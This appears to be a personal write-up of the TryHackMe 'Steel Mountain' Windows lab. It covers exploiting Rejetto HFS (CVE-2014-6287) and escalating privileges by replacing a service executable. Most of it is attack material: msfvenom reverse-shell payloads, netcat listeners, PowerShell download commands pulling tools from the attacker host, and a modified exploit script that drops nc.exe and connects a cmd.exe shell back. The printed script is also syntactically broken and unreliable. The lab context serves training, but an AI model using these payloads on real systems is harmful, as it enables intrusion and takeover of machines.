RSS Feed

Stell Mountain

Created: 28.07.2022

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program! Note: The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.

📕 RTFM (Metasploit)

# get the PowerUp.ps1 script for Windows (see in the DFIR section)
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

search rejetto # you can use spoitsearch first to find relevant exploits that can later be imported into metasploit.
use exploit/windows/http/rejetto_hfs_exec


meterpreter > 

upload /path/to/PowerUp.ps1/script/on/the/attacker\'s/machine 

load powershell

. .\PowerUp.ps1 # yes, . .\PowerUp.ps1, not just .\PowerUp.ps1
Invoke-AllChecks # Lists all misconfigs that can leas to PE.

# Abusing a legit Service Path
# https://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ServiceToAbuse.exe

meterpreter> shell
sc stop ServiceToAbuse # if the service is started, you won't be able to overwrite it. You will get "process is being used" error
meterpreter> cd /path/to/the/service/to/abuse # shell and meterpreter might have differnt current paths
meterpreter> upload /path/to/venom/exe/on/attacking/machine # uploading the service will overwrite the ligit one

# Run a listener. Option #1: netcat
nc -l -p 4443 # the same specified in the msfvenom command
# ❗️ Run a listener. Option #2: msfconsole (use a different msfconsole Terminal)
# the module to use is called exploit/multi/handler 
use exploit/multi/handler
set LHOST <attacker\'s IP>
set LPORT <attacker\'s Port> # the same specified in the msfvenom command

meterpreter> shell
sc start ServiceToAbuse # if the service is started, you won't be able to overwrite it. You will get "process is being used" error

# check your listener

PowerUp.ps1 and winPEAS are two different ways to do the job.

Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!

https://www.exploit-db.com/exploits/39161 standalone netcat - https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe

📕 RTFM (Manual)

Let’s asume the following:

  1. My attacking machine’s IP is X.X.X.X
    1. The first netcat listner is sitting on port YYYY (normal user session)
    2. My python webser is listening on port 80 (webser hosting nc.exe)
    3. My second netcat listener is sitting on port ZZZZ (elevated session)
  2. My victim machine’s IP is S.S.S.S


  1. Download the exploit script (see the update script for Python 3 below).
  2. Download winPEAS.
  3. Download standalone netcat.
    1. Rename it to nc.exe (since the exploit is looking for nc.exe and on github it’s called ncat.exe instead).
  4. Download accesschk.exe.
  5. From whatever directory you have saved the above executables in, run the followng command in the Terminal/console: python -m http.server 80. Note, that the port is set to 80. On TryHackMe you won’t be able to do that easily with an Attack Machine since the port is occupied by some python remote desktop process. In order to make it work, you need to modify the vba script and explicitly specify a different port (vbs variable). Make sure to URL encode the :80 before adding. You can also rename the nc.exe to ncat.exe, instead of renaming the executable itself. Your call.
' from 
xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False
xHttp.Open "GET", "http://"+ip_addr+":80/nc.exe", False
  1. Run nc -l YYYY on the attacker’s machine so that when nc_run() function is run, nc.exe downloaded from your python-powered server could connect to your machine.
  2. Run the script itself with python -m 39161.py S.S.S.S 8080 (note that 39161.py is the default name for this exploit and it might be different in future). If no errors are shown, but the pyton server doesn’t show any activity and nc doesn’t receive any connections, rerun the exploit several times.
  3. Monitor the Terminal with python server running to see if the exploit worked (set up on step 7).
  4. Monitor the Terminal with netcat running to see if any remote session was successfully established (set up on step 6).
  5. Now, in the Terminal window with the nc session successfully established, check the user by running whoami. If all is ok, then run the following powershell command to download winPEAS.exe (to check for misconfigurations that allow privelege escalation) and accesschk.exe (to check file and folder permissions). Sometimes with mac, when you copy a string with a singe quote, it changes it to a `. If powershell complains, check the quotes and better overwrite them manually.
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/winPEAS.exe','C:\Program Files (x86)\IObit\winpeas.exe')

powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/accesschk.exe','C:\Program Files (x86)\IObit\achk.exe')
  1. If all is ok and the files were copied successfully (try Desktop to save them), run winpeas.exe. In this lab we were provided a hint that we can exploit some unquoted service path. You can run winpeas.exe quiet servicesinfo to see only services’ vulnerabilities. Our aim is to find the service that:
    1. Runs with admin (SYSTEM) rights;
    2. The current user (in this case, bill) can start and stop it;
    3. The current use can wrte to the directory the service executable is stored at.
  2. For each service check if they satisfy every requirement listed above with achk.exe /accepteula -ucqv <servicename>.
      • -u stands for “user” and returns information about the user account the specified service runs under.
    1. -c indicates that the user account must have the “Log on as a service” right.
    2. -q specifies that the output should be in a quiet mode, i.e., with minimal output.
    3. -v is for verbose mode and provides more detailed information.
  3. Since it’s the unquoted service path vulnerability, we need to upload our executable with a specific name. Read more about this type of vulnerabilty here [3].

The exploit script was written for Python 2, so I had to add parentheses to the print function. It also used an outdated library, so I had to change the calls from urllib2 to urllib3 and the function it was calling, since they are two completely different libraries. To make troubleshooting easier, I added try-except blocks.

# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#	       It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#	       It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

import urllib3
import sys

	def script_create():
			http = urllib3.PoolManager()
			url = "http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}"
			response = http.request('GET', url)
			print("All good! script_create executed.")
		except Exception as e:
			print("script_create failed: {}".format(e))

	def execute_script():
			http = urllib3.PoolManager()
			url = "http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}"
			response = http.request('GET', url)
			print("All good! execute_script executed.")
		except Exception as e:
			print("execute_script failed: {}".format(e))

	def nc_run():
			http = urllib3.PoolManager()
			url = "http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}"
			response = http.request('GET', url)
			print("All good! nc_run executed.")
		except Exception as e:
			print("nc_run failed: {}".format(e))

	ip_addr = "X.X.X.X" #local IP address
	local_port = "YYYY" # Local Port number
	vbs = r"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	print("""[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script""")
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/Advanced.exe','C:\Program Files (x86)\IObit\Advanced.exe')

msfvenom -p windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=ZZZZ -f exe -o Advanced.exe




A great write up for this lab - https://medium.com/@algobernadortaco/steel-mountain-tryhackme-write-up-w-o-metasploit-c6dd5836ac09 (an option without metasploit).

2 ChatGPT